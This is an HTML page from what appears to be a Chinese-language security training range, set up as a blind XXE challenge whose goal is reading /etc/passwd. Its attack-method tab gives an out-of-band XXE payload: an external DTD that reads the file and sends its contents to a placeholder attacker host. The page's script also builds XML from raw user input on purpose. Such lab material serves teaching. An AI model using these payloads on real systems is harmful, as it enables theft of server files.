<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title></title>
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport"
          content="width=device-width,user-scalable=yes, minimum-scale=0.4, initial-scale=0.8,target-densitydpi=low-dpi"/>
    <link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/>
    <link rel="stylesheet" href="../../../statics/xadmin/css/font.css">
    <link rel="stylesheet" href="../../../statics/xadmin/css/xadmin.css">
    <link rel="stylesheet" href="../../../statics/ceber/css/mardown-css-jwsky.css">
    <link rel="stylesheet" href="../../../statics/ceber/css/highlight/arduino-light.css">


    <script type="text/javascript" src="../../../statics/xadmin/js/jquery.min.js"></script>
    <script src="../../../statics/xadmin/lib/layui/layui.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/showdown.min.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/ceber.js" charset="utf-8"></script>
    <script src="../../../statics/ceber/js/highlight.pack.js" charset="utf-8"></script>


    <style>
        .layui-tab-content {
            padding: 0px;
            padding-top: 10px;
        }

        input {
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
<div class="x-body layui-anim layui-anim-up">
    <blockquote class="layui-elem-quote">XXE 无回显</blockquote>
    <fieldset class="layui-elem-field">
        <legend>题目区</legend>
        <div class="layui-field-box">
            <div class="layui-row" style="vertical-align:bottom">
                <form class="layui-form" method="POST" name="form" contentType="application/xml"
                      action="/ceber-range/xxe/xxe1">
                    <input type="hidden" name="commentXml" id="commentXml"/>
                    <input type="text" name="commentStr" id="commentStr" placeholder="请输入留言" autocomplete="off"
                           class="layui-input">
                    <button type="button" class="layui-btn layui-btn-mini" onclick="ceberSubmitXXE(this);">发布</button>
                </form>
            </div>
            <div class="layui-row" id="comment-div">
            </div>
            <div class="layui-row" id="rs-message">
            </div>
            <div class="layui-row" id="rs-body">
            </div>
            <div class="layui-row" id="rs-hit">
            </div>
            <div class="layui-row" id="rs-bak">
            </div>
            <div class="layui-row" id="rs-bak1111">
                    <pre><code class="javascript">
$(document).ready(function() {
$('pre code').each(function(i, block) {
    hljs.highlightBlock(block);
});
});
                    </code></pre>
            </div>
        </div>
    </fieldset>
    <fieldset class="layui-elem-field">
        <legend>解题区</legend>
        <div class="layui-tab layui-field-box">
            <ul class="layui-tab-title">
                <li class="layui-this">描述</li>
                <li>提示</li>
                <li>源代码</li>
                <li>攻击方法</li>
                <li>防御</li>
            </ul>
            <div class="layui-tab-content">
                <div class="layui-tab-item layui-show" id="mubiao">描述</div>
                <div class="layui-tab-item" id="tishi">提示</div>
                <div class="layui-tab-item" id="yuandaima">源代码</div>
                <div class="layui-tab-item" id="gongjifangfa">攻击方法</div>
                <div class="layui-tab-item" id="fangyu">防御</div>
            </div>
        </div>
    </fieldset>

    <code id="mubiao_source" style="display:none">
        <script type='text/html' style='display:block'>
            读取/etc/passwd文件内容
        </script>
        <
        /code>

        < code
        id = "tishi_source"
        style = "display:none" >
            < script
        type = 'text/html'
        style = 'display:block' >


        </script>
    </code>

    <code id="yuandaima_source" style="display:none">
        <script type='text/html' style='display:block'>


        </script>
        <
        /code>

        < code
        id = "gongjifangfa_source"
        style = "display:none" >
            < script
        type = 'text/html'
        style = 'display:block' >

            一个文件
        attack.dtd
            ```xml
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip:port/?text=%file;'>">
%all;
```

        这样调用此
        dtd
        文件
            ```xml
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://127.0.0.1:8000/attack.dtd">
%remote;
]>
<comment>
  <text>test&send;</text>
</comment>
```

        然后就可以在ip:port服务器的日志里看到 / etc / pass文件的内容。

从上面的利用代码可以看到，xxe可以使用url来引用外部实体，如果这个url是一个精心构造的payload，那么这个url所在的服务器就会被攻击。

        </script>
        </script>
        <
        /code>


        < code
        id = "fangyu_source"
        style = "display:none" >
            < script
        type = 'text/html'
        style = 'display:block' >


        </script>
    </code>
    <blockquote class="layui-elem-quote layui-quote-nm">持续集成</blockquote>
</div>
</body>

<script>
    $(function () {
        //加载弹出层
        layui.use(['form', 'element'],
            function () {
                layer = layui.layer;
                element = layui.element;
            });
        var converter = new showdown.Converter();
        $("#mubiao").html(converter.makeHtml($("#mubiao_source").html().substr(48)));
        $("#tishi").html(converter.makeHtml($("#tishi_source").html().substr(48)));
        $("#yuandaima").html(converter.makeHtml($("#yuandaima_source").html().substr(48)));
        $("#gongjifangfa").html(converter.makeHtml($("#gongjifangfa_source").html().substr(48)));
        $("#fangyu").html(converter.makeHtml($("#fangyu_source").html().substr(48)));
    })

    $(document).ready(function () {
        $('pre code').each(function (i, block) {
            hljs.highlightBlock(block);
        });
    });

    function getXml() {
        var commentInput = $("#commentStr").val();
        var xml = '<?xml version="1.0"?>' +
            '<comment>' +
            '  <text>' + commentInput + '</text>' +
            '</comment>';
        return xml;
    }

    function ceberSubmitXXE(e) {
        var a = e;
        var parent = a.parentNode;
        while (parent.tagName == "form") {
            parent = parent.parentNode;
        }
        curForm = parent;
        var formUrl = $(curForm).attr('action');
        var formMethod = $(curForm).attr('method');
        var contentType = ($(curForm).attr('contentType')) ? $(curForm).attr('contentType') : 'application/x-www-form-urlencoded; charset=UTF-8';
        var submitData = $(curForm).serialize();
        $.ajax({
            url: "/ceber-range/xxe/xxe2",
            method: "POST",
            contentType: "application/xml",
            data: getXml(),
            success: function (data) {
                console.log(data);
                rs = data;
                $("#rs-message").html(rs.code + " " + rs.message);
                $("#rs-body").html(rs.body);
                $("#rs-hit").html(rs.hit);
                $("#rs-bak").html(rs.bak);
                $("#comment-div").val('');
            },
            error: function (jqXHR, textStatus, errorThrown) {
                /*错误信息处理*/
                console.error(jqXHR);
                console.error(textStatus);
                console.error(errorThrown);
            }
        });
        return false;
    }

</script>
</html>